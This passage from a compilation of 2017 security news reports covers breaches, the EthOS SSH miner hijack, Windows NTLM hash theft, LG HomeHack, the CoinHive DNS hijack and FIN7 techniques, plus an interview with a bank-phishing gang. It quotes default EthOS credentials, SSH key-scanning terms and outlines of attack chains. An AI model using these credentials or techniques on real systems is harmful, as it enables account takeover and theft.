"I'm grateful for the timely and thorough review," non-executive chairman Mark Feidler said in the statement.

"It is critically important for the public, our shareholders, our customers and our employees to know that we will not tolerate any violation of company policy or the law regarding the trading of securities."

The data breach -- potentially one of the worst in history because of the sensitivity of the data that was leaked -- remains the subject of investigations by US authorities and congressional committees.

Equifax, which gathers data on consumers for credit inquiries, has blamed a combination of human and technical error for the massive breach.

The breach led to the retirement of Equifax chief executive Richard Smith, who has remained as a consultant to the company during the investigation.


SSH-based Hijacker Targeting Ethereum Miners
2.11.2017 securityweek  Hacking
Crypto-currency miners represent an easy solution when it comes to taking advantage of a system’s computing power to earn some money, but can result in no gain if the mined coins are going to someone else’s wallet.

In a recent example of how users could end up with no cash despite putting their computers to work, Ethereum-mining farms are at the receiving end of an attack involving a hijacker that simply attempts to replace the user’s wallet with an unknown actor’s.

The attack takes advantage of the increased popularity emerging crypto-currencies such as Monero and Ethereum have seen lately. First spotted on Monday, the attack relies on changing the default configuration of Ethereum-miners to hijack the funds, Bitdefender’s threat analyst Bogdan Botezatu reveals.

The attackers are specifically targeting EthOS, an operating system optimized for Ethereum mining, but also capable of mining Zcash, Monero, and other crypto-currencies that rely on GPU power. The platform is said to run on more than 38,000 mining rigs across the world at the moment and to arrive pre-loaded with all the necessary tools, as well as with a default username and password.

After deployment, the user simply needs to add their own wallet for mining fees and to change the default username and password. Systems where the default credentials haven’t been changed are those targeted in the newly discovered attack.

“The bot scans for the entire IPv4 range and looks for open SSH connections. If found, it attempts to log in using the default username and password to the EthOS operating system: ethos:live and root:live,” Botezatu explains.

Should the login be successful, the bot then attempts to change the existing configuration for Ethereum and hijack the mining process so that the funds are sent to the attacker’s Ethereum address. The security researchers discovered that the attackers’ wallet had already received 10 transactions over a couple of days, worth a total of $611 in Ether.

“So, if you are running an Ether Miner based on Ethereum OS, make sure you have changed the default login credentials. If you haven’t done so, now would be a good time to check whether the miner is sending money to you, not hackers,” Botezatu concludes.


Hashcat 4.0.0 now can crack passwords and salts up to length 256
30.10.2017 securityaffairs Hacking

The new version of the tool, Hashcat 4.0.0 release is now available and includes the support to crack passwords and salts up to length 256.
Hashcat is likely the world’s fastest password recovery tool that is released as free software. It is available for Windows, Linux and OS X, and it is distributed as CPU-based or GPU-based applications.

The new version of the tool, Hashcat 4.0.0 release is now available and includes the support to crack passwords and salts up to length 256.

Users can download the tool here: https://hashcat.net/hashcat/.

The implementation of this new feature took a significant effort of the development team.

“Internally, this change took a lot of effort – many months of work. The first step was to add an OpenSSL-style low-level hash interface with the typical HashInit(), HashUpdate() and HashFinal() functions.” states the official announcement for Hashcat 4.0.0. “After that, every OpenCL kernel had to be rewritten from scratch using those functions. Adding the OpenSSL-style low-level hash functions also had the advantage that you can now add new kernels more easily to hashcat – but the disadvantage is that such kernels are slower than hand-optimized kernels.”

The developers initially added an OpenSSL-style low-level hash interface, later they have had rewritten from scratch the OpenCL kernel.

The new version also includes a self-test functionality to detect broken OpenCL runtimes on startup, it is the first time that such kind of feature is added to the tool.

Some older OpenCL runtimes were somewhat faulty and errors were hard to discover due to the lack of any error message.

“With this version, hashcat tries to crack a known hash on startup with a known password. Failing to crack a simple known hash is a bulletproof way to test whether your system is set up correctly.” continues the announcement.

hashcat 4.0.0

Hashcat 4.0.0. added hash-mode 2501 = WPA/WPA2 PMK, it allows to run precomputed PMK lists against a hccapx. To precompute the PMK, the development team suggests using the wlanhcx2psk from hcxtools, it is a solution for capturing WLAN traffic and convert it to hashcat formats.

The new release of the popular password recovery tool also improved the macOS support.

“The evil “abort trap 6” error is now handled in a different way. There is no more need to maintain many different OpenCL devices in the hashcat.hctune database.” continues the announcement.

The new version of the tool also added the implementation for the following algorithms.

Added hash-mode 2500 = WPA/WPA2 (SHA256-AES-CMAC)
Added hash-mode 2501 = WPA/WPA2 PMK


Mysterious hack allows attackers stealing Windows login credentials without user interaction
29.10.2017securityaffairs Hacking

Microsoft fixed a vulnerability that could allow hackers to steal Windows login credentials without any user interaction.
Microsoft fixed a serious vulnerability that could allow attackers to steal Windows NTLM password hashes without any user interaction.

The tech giant patched the issues only for recent versions Windows (Windows 10 and Server 2016), to trigger the flaw the attacker just needs to do is to place a specially crafted Shell Command File (SCF file) inside publicly accessible Windows folders.

Once the attacker has placed the file in the folder, it executes due to the security issue, gathers the machine NTLM password hash, and sends it back to the attacker’s server.

Then the attacker can easily crack the NTLM password hash to access the victim’s computer. The hack was reported to Microsoft in May by the Columbian security researcher Juan Diego.

“It is a known issue that Microsoft NTLM architecture has some failures, hash stealing is not something new, it is one of the first things a pentester tries when attacking a Microsoft environment. But, most of these techniques require user intervention or traffic interception to fulfill the attack.” wrote Juan Diego.

“These new attacks require no user interaction, everything is done from the attacker’s side, but of course, there are some conditions that need to be met to be successful with this attack.”

Older Windows versions remain vulnerable because the registry modifications are not compatible with older versions of the Windows Firewall.

“Accordingly to Microsoft, all Windows versions since 3.11 till Windows 10, Desktop and server are vulnerable to this kind of attack.” explained Diego.

“Honestly, I have only tested on Windows 7 and Windows 10, then I passed the ball to Microsoft 🙂”

The good news is that the hack doesn’t work against machines with shared folders that are protected by a password, and this is the default option in Windows limiting the extent of the vulnerability.

Windows login credentials shared folders

Nonetheless, in many cases the Windows users need to share folders without a password according to their needs, opening their systems for attacks.

Microsoft fixed the issue with the October Patch Tuesday via the ADV170014 security advisory.
Be careful, the ADV170014 is an optional patch, installing it is highly recommended.

Diego was not able to detail why the attack was possible, in previously known attacks leveraging SCF files, in order to trigger the flaw, the victim should have had access the folder.

In the attack scenario detailed by Diego, the SCF files are executed just after the attacker place it in the shared folder without needing user’s interaction.

According to Bleepingcomputers.com, Microsoft acknowledged another security researcher, Stefan Kanthak, for reporting the issue.

“While Diego has reported his attack to Microsoft, it was German researcher Stefan Kanthak who got an acknowledgment from Microsoft for the fixed issue, as he too reported similar bugs in March 2017.” reported Bleeping computer.

“Microsoft did (as every so often) a POOR job, the updates published this month close only 2 of the 6 distinct weaknesses I reported,” Kanthak told Bleeping via email, hinting that more ways to exploit pass-the-hash attacks exist.

Let me close with mitigation provided by Diego:

“Microsoft created a sort of patch to this vulnerability consisting in changing two registry keys to disable NTLM on the system. This registry keys are available only on Windows 10 and Windows Server 2016, and Microsoft has no intentions to backport to the other versions.

Another issue is that disabling NTLM will break a lot of environments, and that’s a huge concern for them.” suggested the expert.

“My suggestion is to use strong passwords, after the attack we need to crack the hash, that can take a lot of time if the password is complex, and can be frustrating for the attacker.

The better approach, don’t share folders without passwords, that’ll do the trick.”


jQuery Official Blog Hacked — Stay Calm, Library is Safe!
27.10.2017 thehackernews Hacking

The official blog of jQuery—most popular JavaScript library used by millions of websites—has been hacked by some unknown hackers, using the pseudonym "str0ng" and "n3tr1x."
jQuery's blog website (blog.jquery.com) runs on WordPress—the world's most popular content management system (CMS) used by millions of websites.
While there is no evidence yet if the server (code.jquery.com) that host jQuery file was also compromised, The Hacker News took a screenshot (as shown above) and can confirm that the hackers merely published a simple blog post to deface the website.
The defaced blog post URL — http://blog.jquery.com/2017/10/26/hacked/ (now removed).
Since the above-mentioned blog post was published under the name of Leah Silber, a core member of jQuery team, it seems hackers were able to make their post live by compromising Silber's account—probably by reusing her password leaked in a previous data breach.
If not, the hackers might have gained unauthorized access to the website either by exploiting a (known or zero-day) vulnerability in Wordpress script or the server.
jQuery team has immediately removed the post created by the hackers as soon as they realized there was a compromise, but so far the organisation has not released any official statement about the incident.
This is not the first time when jQuery's website has been compromised. In 2014, the main domain (jQuery.com) was reportedly compromised, redirecting the site's visitors to a page hosting an exploit kit.
Since millions of websites directly use jQuery script hosted by jQuery server, today's attack could be worse if the hackers would have been able to compromised code.jquery.com in an attempt to replace the official jQuery file with the malicious one, putting billions of visitors of millions of websites at risk of malware attacks.
A similar incident took place yesterday, when a hacker managed to replace official JavaScript file hosted by Coinhive—a popular browser-based cryptocurrency miner—with a modified version that eventually tricked CPUs of millions of visitors of thousands of websites to mine cryptocurrencies for the hacker unknowingly.
Interestingly, Coinhive was also hacked via password reuse attack, allowing the attacker to gain its CloudFlare account and change DNS settings unauthorizedly.
We'll update you with more information on the incident. Stay tuned!


Hackers Could Turn LG Smart Appliances Into Remote-Controlled Spy Robot
27.10.2017 thehackernews Hacking

If your smart devices are smart enough to make your life easier, then their smart behaviour could also be exploited by hackers to invade your privacy or spy on you, if not secured properly.
Recent research conducted by security researchers at threat prevention firm Check Point highlights privacy concern surrounding smart home devices manufactured by LG.
Check Point researchers discovered a security vulnerability in LG SmartThinQ smart home devices that allowed them to hijack internet-connected devices like refrigerators, ovens, dishwashers, air conditioners, dryers, and washing machines manufactured by LG.
...and what's worse?
Hackers could even remotely take control of LG's Hom-Bot, a camera-equipped robotic vacuum cleaner, and access the live video feed to spy on anything in the device's vicinity.
This hack doesn't even require hacker and targeted device to be on the same network.
Dubbed HomeHack, the vulnerability resides in the mobile app and cloud application used to control LG's SmartThinkQ home appliances, allowing an attacker to remotely gain control of any connected appliance controlled by the app.
This vulnerability could allow hackers to remotely log into the SmartThinQ cloud application and take over the victim's LG account, according to the researchers.
Watch the Video Demonstration of the HomeHack Attack:

 

The researchers demonstrated the risks posed by this vulnerability by taking control of an LG Hom-Bot, which comes equipped with a security camera and motion detection sensors and reportedly owned by over one million users.
You can watch the video posted by the Check Point researchers, which shows how easy it is to hijack the appliance and use it to spy on users and their homes.
The issue is in the way SmartThinQ app processes logins, and exploiting the issue only requires a hacker with a moderate skill to know the email address of the target, and nothing else.
Since hackers can merely bypass a victim's login using the HomeHack flaw, there is no need for them to be on the same network as the victim, and primary IoT security tips such as avoid using default credentials, and always use a secure password also fails here.
Also, such devices which are supposed to give users remote access from an app cannot be put behind a firewall to keep them away from the exposure on the Internet.
In order to perform this hack, the hacker needs a rooted device and requires to intercept the app traffic with the LG server.
However, the LG app has a built-in anti-root mechanism, which immediately closes if detects the smartphone is rooted, and SSL pinning mechanism, which restricts intercepting traffic.
So, to bypass both security features, Check Point researchers said hackers could first decompile the source of the app, remove the functions that enable SSL pinning and anti-root from the app's code, recompile the app and install it on their rooted device.
Now, hackers can run this tempered app on their rooted smartphone and can set up a proxy which could allow them to intercept the application traffic.
Here's How the HomeHack Attack Works:
Researchers analyzed the login process of the SmartThinQ app and found that it contains the following requests:
Authentication request – the user would enter his/her login credentials, which would be validated by the company's backend server.
Signature request – creates a signature based on the above-provided username (i.e. the email address), and this signature has nothing do with the password.
Token request – an access token for the user account is generated using the signature response as a header and username as a parameter.
Login request – sends the above-generated access token in order to allow the user to login to the account.
However, researchers found that there's no dependency between the first step and the subsequent two mentioned above.
So, an attacker could first use his/her username to pass step one, and then intercept the traffic in order to change the username to the victim's username for steps two and three, which would effectively grant the attacker access to the victim's account.
Once in control of the target account, the attacker can control any LG device or appliance associated with that account, including refrigerators, ovens, dishwashers, washing machines and dryers, air conditioners, and robot vacuum cleaners.
Hackers can then change the settings on the hacked devices, or can simply switch on or off.
This Is What You Can Do Now:
Researchers disclosed the vulnerability to LG on July 31 and the device manufacturer issued an update to patch the issue in September.
So, if you own any LG SmartThinQ appliance, you are strongly advised to update to the LG SmartThinQ mobile app to the latest version (1.9.23) through Google Play Store, Apple App Store or the LG SmartThinQ settings.


Hackers broke into the celeb London Bridge Plastic Surgery clinic
26.10.2017 securityaffairs Hacking

The celeb London Bridge Plastic Surgery clinic confirmed in a statement that it has been the victim of a cyber attack.
The story I’m going to tell you shows the risks of cyber attacks to users’ privacy, a plastic surgery clinic frequented by celebrities suffered a security data breach.

The clinic is the London Bridge Plastic Surgery, among its clients there are celebrities like Katie. The clinic confirmed in a statement that it has been the victim of a cyber attack, the alleged culprit is a well-known hacker that goes online with the moniker The Dark Overlord.

In April the hacker ‘The Dark Overlord’ claimed to have stolen and leaked online episodes from the forthcoming season of the TV show Orange Is The New Black.

“We can confirm that the Clinic has been the victim of a cyber attack. We took measures to block the attack immediately in order to protect patient information and we informed the Metropolitan Police who launched an investigation,” states the statement issued by the London Bridge Plastic Surgery (LBPS).

“Regrettably, following investigations by our IT experts and the police, we believe that our security was breached and that data has been stolen. We are still working to establish exactly what data has been compromised,”

“The Dark Overlord, a hacking group known for mocking and extorting victims, has now stolen highly personal photos from a plastic surgeon in London.” reported Joseph Cox from The Daily Beast.

The Dark Overlord contacted Cox using an email account belonging to LBPS to prove they had compromised the systems at the clinic. The group sent The Daily Beast a cache of photos of LBPS operations.

The cache includes highly graphic and close-up images showing surgery on male and female genitalia, other pictures show apparent patients bodies post-operation, and in some cases they include faces.

“None of a selection of tested photos returned any matches from Google reverse image searches, implying that they were indeed obtained from a private source. Several pictures include LBPS’ chief surgeon Chris Inglefield, wearing his distinctive, multi-colored head scarves. In one image, he is wearing an identical head scarf to that in an image on LBPS’ website.” continues Cox.

The hacker crew also claims that stolen data contains information on royal families and it is threatening to leak the patient list and their photos.

The clinic was not prepared to this cyber attack, it was shocked by the event as admitted in the statement.

“We are horrified that they have now targeted our patients,” continued.” states the LBPS statement.

“Security and patient confidentiality has always been of the utmost importance to us. We invest in market-leading technology to keep our data secure and our systems are updated daily. We are deeply saddened that our security has been breached. We are profoundly sorry for any distress this data breach may cause our patients and our team are available around the clock to speak to anyone who has any concerns by calling 0203 858 0664,”

The British authorities are investigating the data breach.


Offshore Legal Firm Appleby Hacked, financial details of rich clients is set to be released
25.10.2017 securityaffairs Hacking

The Financial details of some of the world’s richest people are set to be published after the Offshore Legal Firm Appleby suffered a data security incident.
A new financial data leak made the headlines, financial details of clients of an offshore a legal firm is set to be published. The news was reported on Wednesday by a British newspaper, the Bermuda-based offshore firm Appleby was hacked and data could be available online very soon.

The Telegraph reported the news saying “some of the world’s richest people were braced for their financial details to be exposed”.

“It is understood the leak involves some of Britain’s wealthiest people, who were instructing lawyers and public relations companies in an effort to protect their reputations,” added the newspaper.

The Offshore law firm Appleby confirmed it has received inquiries from the International Consortium of Investigative Journalists in relation to the leaked documents.

The Telegraph added that “global consortium of left-leaning media organisations” is set to release the information “in the coming days.”.

The ICIJ is a global network of investigative journalists that made the headlines in 2015 after the release of the Panama Papers, the huge trove of documents stolen from Panamanian law firm Mossack Fonseca.

The Appleby firm said the inquiries “have arisen from documents that journalists claim to have seen and involve allegations made against our business and the business conducted by some of our clients.”

“Appleby has thoroughly and vigorously investigated the allegations and we are satisfied that there is no evidence of any wrongdoing, either on the part of ourselves or our clients,” said the law firm, which has multiple offices in locations including Bermuda and the Cayman Islands.

“We refute any allegations which may suggest otherwise and we would be happy to cooperate fully with any legitimate and authorised investigation of the allegations by the appropriate and relevant authorities.”

Appleby hacked

The firm confirmed that the expected publication of sensitive documents is the result of a security incident occurred last year.

“We are committed to protecting our clients’ data and we have reviewed our cybersecurity and data access arrangements following a data security incident last year which involved some of our data being compromised,” the statement said. “These arrangements were reviewed and tested by a leading IT forensics team and we are confident that our data integrity is secure.”

At the time there are no details about the hack or system affected.

The Daily Telegraph added that Appleby is notifying the security breach to its customers, the law firm denied that any of the allegations leveled against its clients involved misconduct.

Last year, the ICIJ released the Panama Papers, it was an earthquake in financial and political elites.


Hacker Hijacks CoinHive's DNS to Mine Cryptocurrency Using Thousands of Websites
25.10.2017 thehackernews  Hacking

Hacker Hijacks CoinHive's DNS to Mine Cryptocurrency Using Thousands of Websites
When yesterday I was reporting about the sudden outbreak of another global ransomware attack 'Bad Rabbit,' I thought what could be worse than this?
Then late last night I got my answer with a notification that Coinhive has been hacked — a popular browser-based service that offers website owners to embed a JavaScript to utilise their site visitors' CPUs power to mine the Monero cryptocurrency for monetisation.
Reportedly an unknown hacker managed to hijack Coinhive's CloudFlare account that allowed him/her to modify its DNS servers and replace Coinhive's official JavaScript code embedded into thousands of websites with a malicious version.
https://coin-hive[.]com/lib/coinhive.min.js
Hacker Reused Leaked Password from 2014 Data Breach
Apparently, hacker reused an old password to access Coinhive's CloudFlare account that was leaked in the Kickstarter data breach in 2014.
"Tonight, Oct. 23th at around 22:00 GMT our account for our DNS provider (Cloudflare) has been accessed by an attacker. The DNS records for coinhive.com have been manipulated to redirect requests for the coinhive.min.js to a third party server." Coinhive said in a blog post today.
"This third-party server hosted a modified version of the JavaScript file with a hardcoded site key."
As a result, thousands of sites using coinhive script were tricked for at least six hours into loading a modified code that mined Monero cryptocurrency for the hacker rather than the actual site owners.
"We have learned hard lessons about security and used 2FA [Two-factor authentication] and unique passwords for all services since, but we neglected to update our years old Cloudflare account."
Your Web-Browsers Could Be Mining Cryptocurrencies Secretly for Strangers
Coinhive gained media attention in last weeks after world's popular torrent download website, The Pirate Bay, caught secretly using this browser-based cryptocurrency miner on its site.
Immediately after that more than thousands of other websites also started using Coinhive as an alternative monetisation model by utilising their visitors' CPU processing power to mine digital currencies.
Even hackers are also using Coinhive like services to make money from compromised websites by injecting a script secretly.
Well, now the company is also looking ways to reimburse its users for the lost revenue due to breach.
How to Block Websites From Hijacking Your CPU to Mine Cryptocoins
Due to concerns mentioned above, some Antivirus products, including Malwarebytes and Kaspersky, have also started blocking Coinhive script to prevent their customers from unauthorised mining and extensive CPU usage.
You can also install, No Coin Or minerBlock, small open source browser extensions (plug-ins) that block coin miners such as Coinhive.


Offshore Legal Firm Hacked, Braces for Media Leaks
24.10.2017 securityweek Hacking
Financial details of some of the world's richest people are set to be published after a Bermuda-based offshore firm suffered a data breach, a British newspaper reported Wednesday.

The legal firm, Appleby, said it was bracing for documents to be published after being approached by the media network behind the Panama Papers.

The US-based International Consortium of Investigative Journalists (ICIJ) and affiliated media raised allegations against the company's operations and its clients, following information being leaked.

"Appleby has thoroughly and vigorously investigated the allegations and we are satisfied that there is no evidence of any wrongdoing, either on the part of ourselves or our clients," said the law firm, which has multiple offices in locations including Bermuda and the Cayman Islands.

"We refute any allegations which may suggest otherwise and we would be happy to cooperate fully with any legitimate and authorised investigation of the allegations by the appropriate and relevant authorities."

The expected publication of Appleby documents follows "a data security incident last year which involved some of our data being compromised," the firm said, without giving further details.

Appleby is yet to feature in a report by the ICIJ, which last year released the Panama Papers setting in motion a scandal which shook political and financial elites.

The publication of 11.5 million digital records from the Panamanian law firm Mossack Fonseca revealed how many of the world's wealthy used offshore companies to stash assets, leading to at least 150 inquiries or investigations in 79 countries as of March 2017.

The Telegraph put the Appleby case on its front page Wednesday, saying "some of the world's richest people were braced for their financial details to be exposed".

"It is understood the leak involves some of Britain's wealthiest people, who were instructing lawyers and public relations companies in an effort to protect their reputations," the newspaper said.

A "global consortium of left-leaning media organisations" is set to release the information "in the coming days," added the conservative daily.


UK Probes Equifax Hacking
24.10.2017 securityweek Hacking
Britain's financial watchdog on Tuesday said it was investigating a massive hack of the US consumer credit rating service Equifax that affected potentially almost 700,000 British customers.

In a short statement, the Financial Conduct Authority said "it is investigating the circumstances surrounding a cybersecurity incident that led to the loss of UK customer data held by Equifax Ltd on the servers of its US parent".

The hack between May and July resulted in the theft of personal information from around 145 million US customers and led to the resignation of Equifax chief executive Richard Smith.

Smith blamed a combination of human and technical error for the serious breach.


Threat actors started scanning for SSH Keys on websites
19.10.2017 securityaffairs Hacking

Threat actors in the wild are mass-scanning websites for directories containing SSH private keys to hack them.
The SSH allows a secure way to connect to servers hosting the websites, it allows administrators to get a terminal on them and enter commands.

The SSH authentication could rely on login credentials (username and password), or on a “key-based” approach.

When using key-based authentication, users generate an encryption key pair, a public and private key. The public key is placed on the server users want to sign in to. The private key is saved by the users in a local SSH configuration directory.

“Wordfence is seeing a significant spike in SSH private key scanning activity.” warned the WordPress security firm. “If your private SSH key ever gets out, anyone can use it to sign in to a server where you have set up key-based authentication. It is very important to keep your private key safe.”

Threat actors are mass-scanning the web searching for web directories containing the terms, or combinations of terms, such as “root,” “ssh,” or “id_rsa.”

Researchers observed a spike in SSH Private Key scans in the past 48 hours.

“The graph shows a massive spike in scanning activity in the past 48 hours,” said Wordfence CEO Mark Maunder. “We think this increase of activity may indicate that an attacker is having some success scanning for private keys and has decided to increase their efforts. This may indicate a common bug or operational mistake that is being made by WordPress site owners, by which private keys are being accidentally made public.”

SSH keys scans

Recently the provider of identity protection services Venafi published a report that revealed that 61% of organizations have minimal control of SSH privileged access.

The company conducted a study among 410 IT security professionals and found “a widespread lack of SSH security controls.”

“Cybercriminals can abuse SSH keys to secure and automate administrator-to-machine and machine-to-machine access to critical business functions. According to Venafi’s research, even though SSH keys provide the highest levels of administrative access they are routinely untracked, unmanaged and poorly secured.” states the report.

Website administrators are advised to check if they haven’t accidentally uploaded their SSH private key on servers, or committed the SSH private key to Git or SVN repositories.

“Your SSH keys are usually kept in a private directory on your workstation. On Apple workstations, the keys are kept in the following directory:

/Users/<yourname>/.ssh/<key-filename>

On Windows workstations, the location where SSH keys are stored depends on which software you are using, so check your vendor documentation.” concluded Wordfence.


Many Equifax Hack Victims Had Info Stolen Prior to Breach: IRS
19.10.2017 securityweek Hacking

The U.S. Internal Revenue Service (IRS) believes the recent Equifax breach will not make a significant difference in terms of tax fraud considering that many victims already had their personal information stolen prior to the incident.

IRS Commissioner John Koskinen told the press on Tuesday that 100 million Americans have had their personally identifiable information (PII) stolen by hackers, according to The Hill. He also advised consumers to assume that their data has already been compromised and act accordingly.

The Equifax breach, which affected more than 145 million individuals, allowed cybercriminals to access social security numbers, dates of birth and other information. Despite this being one of the largest data breaches in history, Koskinen said it likely “won’t make any significantly or noticeable difference.”

In prepared remarks, Koskinen said the IRS stopped 883,000 attempts to file tax returns using stolen information in 2016, which represents a 37% drop compared to the previous year. Another 30% decrease in fraud attempts was observed this year, when 443,000 instances were discovered throughout August.

Koskinen also pointed out that the number of identity theft victims, based on reports received by the IRS, dropped by 46% in 2016 to 376,000. Another significant decrease in the number of identity theft reports was recorded this year.

“We know cybercriminals are planning for the 2018 tax season just as we are. They are stockpiling the names and SSNs they have collected. They try to leverage that data to gather even more personal information. This coming filing season, more than ever, we all need to work more diligently and work together to combat this common enemy,” the commissioner said.

The IRS has been working on strengthening the security of its systems. In the past year, the agency was forced to suspend several of its online services due to security concerns, including the Identity Protection PIN tool, the Get Transcript service, and the Data Retrieval Tool for Federal Student Aid applications. The Get Transcript service was abused by fraudsters to access the online accounts of more than 700,000 taxpayers.


Hacker interview – Speaking with ICEMAN: Banks holes like in Cheese
16.10.2017 securityaffairs Hacking

The web journalist Marc Miller has interviewed one of the hackers of the ICEMAN group that claims to be behind the Operation ‘Emmental’ that targeted bank clients.
Operation “Emmental” is the nickname for a grand-scale phishing campaign targeting bank clients. The goal of the campaign is to receive fraudulent payments by taking actions (e.g. money transfers) on behalf of the legitimate end user.
By phishing the victims with a mobile application which mimics the bank’s genuine application, the hackers steal the two-factor-authentication tokens used during the login (both user/passwords and SMS verification code) and then issuing money transfers by SMS Services offered by the bank, together with sending these sensitive credentials to the hackers infrastructure.
ICEMAN group
The ICEMAN group, which first came to knowing after contacting me to claim responsibility for the Banrisul Bank attack in Brazil, now claim they have committed many of the reported “Emmental” attacks as well. The hacker’s intentions and motives are shown at first in this exclusive interview.

What was your goal of the attack?
We need more bank accounts to sell. The beauty of what we do with “Emmental”, like you call it is that we can now aim at high-end customers. That’s much bigger than the people we usually scam. Also, this whole attack was a huge challenge, we wanted to see if we could overcome something tough (security wise) and on the way make some real money. I’m the one who wrote the core of the app, perhaps.
Was it all your idea?
Not really, some other guys on the web shared their tricks with us. They only did it for a dozen clients or so. We took it to the next step and did it on a grand scale targeting banks worldwide.

How many of these operations are you doing at the same time?
U mean different banks? Several. We mass email and mass SMS which basically sending our stuff to everyone. If it lands on a client of a bank we know and target – we’re taking him in. U have no idea how many targets we manage to obtain control on.
Where do you get information about potential targets?
Easily, we have fake identities which are established as legitimate companies, which through them we buy data from marketing companies. Using these “companies” we can do all sort of other things.
Such as?
For example, let’s just say that companies signing mechanisms are not a wall for us as they are for other hackers.
I see, but once you get to their phone, do you need to operate each target?
Nah, only when the verification comes in. After testing on individuals, we worked hard on automation and now we’ve got the whole thing automated on multiple servers on different cloud services. Once we were done with our infrastructure we didn’t need to do anything anymore but cashing it in and keeping the whole thing maintained.

How many attacks did you already do?
Depends on what u call an “attack”, we successfully stole from hundreds of individuals worldwide. We’re not the only ones doing it. We got some mates doing other attacks that were already reported, but I’m not really gonna say anything about them. All I say is… just wait you will see.
How could you fake an app without the bank’s attention?
They do notice it, they let the security companies know, and then the security mobile apps blocks and removes us. At the same time, they try using law enforcement take down our C2 infrastructure and block communications to it. But that’s the game, it’s a cat and mouse game in which we currently win.

Where did you get your C2 servers? Are they yours?
For the special operations, we use unique methods we developed in-house, but for most activity we use a chain of hacked servers and rented cloud services.
How do you pay for cloud services?
More and more companies accept BTC, in the past, it was harder.
For some ops we use our “companies” we established.
What about the language barrier? You seemed to impersonate banks worldwide.
Yeah, that was the only problem, we don’t really speak most of the languages there, so we had to improvise
What artifacts from the attack can you reveal me?
I’ll send u some screen-shots later on if my guys will approve it
Do your teammates have different roles? Or is everyone doing everything?
I’m responsible for the phishing and the app (expert at Java). We have another member who’s a killer at the server side aspect, and another guy supplies us with infrastructure. Our top guy is a cellular genius. He knows everything related to SMS protocols, 2G or 3G communications and such, he worked on a communication company in his past, so he helps us break through the phones and get what we want. Other guys are mostly working on “speared marketing”, general programming, UI and such. We’re like a small international startup company.
Are you all sitting together?
Nobody sits together these days. We’ve got a nice group chat with our own XMPP servers. To tell u the truth, I don’t even know where half the other guys are from. But as long as we can PGP or discuss through forums or pidgin, we’re good.

What kind of emails do you send to your victims?
Like I said, most mails we send are automated but using advanced marketing solutions like the legitimate marketing companies use. Very few are truly tailored made. For example, we might check on a target using data we acquired as mentioned earlier and see what he’s into – business or sports or whatever – and then we’ll send him something that looks officially and related to that matter. He’s going to press it since he likes it, and then we unleash our RAT on him.

Is this operation similar to Banrisul?
We don’t talk about Banrisul anymore

What are your expectations for the future and where do you want to go?
I saw numerous reports about our actions, generally the main players we should be afraid of are the Russians or the Feds, but clearly, nobody has a f**king clue on how to take us down… My intention is to go on with this until it dies out or until it will be too hard \ time consuming to maintain. It’s not like that’s our only operation…
Besides the questions above, many other questions asked were not given answers, or simply ignored. We will update on any news from our contact at the ICEMAN group.
About the Author: Marc Miller
Marc Miller is a web journalist, focused on cybercrime.
He started a blog called: THE PURPLE HAT – Cyber Gangs NAKED, dedicated to exposing the methods and works of cybercrime gangs such as “CARBANAK” or similar sophisticated syndicated Cybercrime organizations.

In the past. he worked as a web front-end programmer. Also, he is passionate about hardware, hacking, security and marketing.


Payment Cards Stolen in Pizza Hut Website Hack
16.10.2017 securitweek Hacking
Pizza Hut U.S. informed customers over the weekend that their payment card and contact information may have been compromised after cybercriminals breached its website.

Emails sent out by the restaurant chain to affected individuals describe the incident as a “temporary security intrusion” on PizzaHut.com.

According to the company, the hackers only had access to the site between the morning of October 1, 2017 through midday on October 2, 2017 for a total of roughly 28 hours. Customers who used the Pizza Hut website or mobile app to place an order during this period could be affected.

Pizza Hut said the breach was quickly detected and addressed, and it estimates that less than one percent of website visits during that week were impacted. McClatchy learned that roughly 60,000 people across the United States are affected by the incident.

The restaurant chain said its external cybersecurity consultants determined that the attackers may have obtained information such as name, billing ZIP code, delivery address, email address, and payment card data, including card number, expiration date and CVV.

Affected customers are being offered free credit protection services for one year. However, several people reported on social media that their payment cards have already been used for fraudulent transactions, possibly as a result of this breach.

While it’s not uncommon for companies to inform customers of a breach only after completing at least an initial assessment, some of the individuals who reported seeing unauthorized charges on their cards are displeased with the fact that it took Pizza Hut two weeks to send out the notifications.

This was not the first time hackers targeted Pizza Hut. Back in 2012, a group defaced the company’s Australia website and claimed to have obtained roughly 240,000 Australian payment cards.

Several major restaurant chains reported suffering a data breach in the past months, including Sonic Drive-In, Wendy’s, Cicis, Arby’s, Chipotle, Shoney’s, and Noodles & Company.


FIN7 Hackers Change Attack Techniques
15.10.2017 securityweek Hacking
The financially-motivated FIN7 hacking group recently switched to a new delivery technique and has been employing a different malware obfuscation method, ICEBRG security researchers reveal.

Highly active since the beginning of 2017, FIN7 (also known as Anunak, or Carbanak) started distributing malware via LNK files embedded in Word documents using the Object Linking and Embedding (OLE) technology. The attack employed a fileless infection method, with no files being written to disk.

The hackers have since switched to using CMD files instead of LNK ones, most probably in an attempt to evade detection. The CMD, the researchers explain, would write JScript to “tt.txt” under the current user’s home directory.

Next, the batch script copies itself to “pp.txt” under the same directory, and then runs WScript using the JScript engine on the file. According to ICEBRG, the JScript code then reads from the “pp.txt” file, evaluating anything after the first character for each line in the file. However, it skips the first four lines, which represent the CMD code itself.

The same as with the LNK files, however, the use of OLE embedded CMD files results in code execution on the victim’s machine. The use of commented out code isn’t new either, and has been previously associated with FIN7.

The security researchers also observed a series of changes to the obfuscation strategy the hackers are using for their unique backdoor, HALFBAKED, which has been continuously morphing over the past year.

Until now, different stages of the HALFBAKED codebase used base64 encoding, stored in a string array variable called “srcTxt,” the researchers explain. Now, the name is obfuscated and the base64 string is broken down into multiple strings within an array.

Furthermore, the backdoor now includes a built-in command called “getNK2”which is meant to retrieve the victim’s Microsoft Outlook email client auto-complete list. The command was likely named after the NK2 file that contains a list of auto-complete addresses for Microsoft Outlook 2007 and 2010.

“This may suggest the actor’s desire to obtain new phishing targets within a victim organization. If any of these new targets fell victim to the phishing lure, it would allow FIN7 to increase their foothold within a victim organization’s network and potentially pivot to new areas,” the researchers note.

Although newer versions of Outlook no longer use the NK2 file, the backdoor targets them as well, because the hackers also wrote functionality to handle them within the same “getNK2” command.

“Detection authors must make trade-offs to optimize signature performance; narrow signatures lead to high fidelity detections, but risk missing changes in actor behaviors, meanwhile broader detection patterns provide better coverage, at the risk of more false positives. Combatting a well-resourced and adaptive adversary requires a layered approach of both signature styles,” ICEBRG concludes.


Sri Lanka police arrest two men over cyber theft at the Taiwan Bank
9.10.2017 securityaffairs Hacking

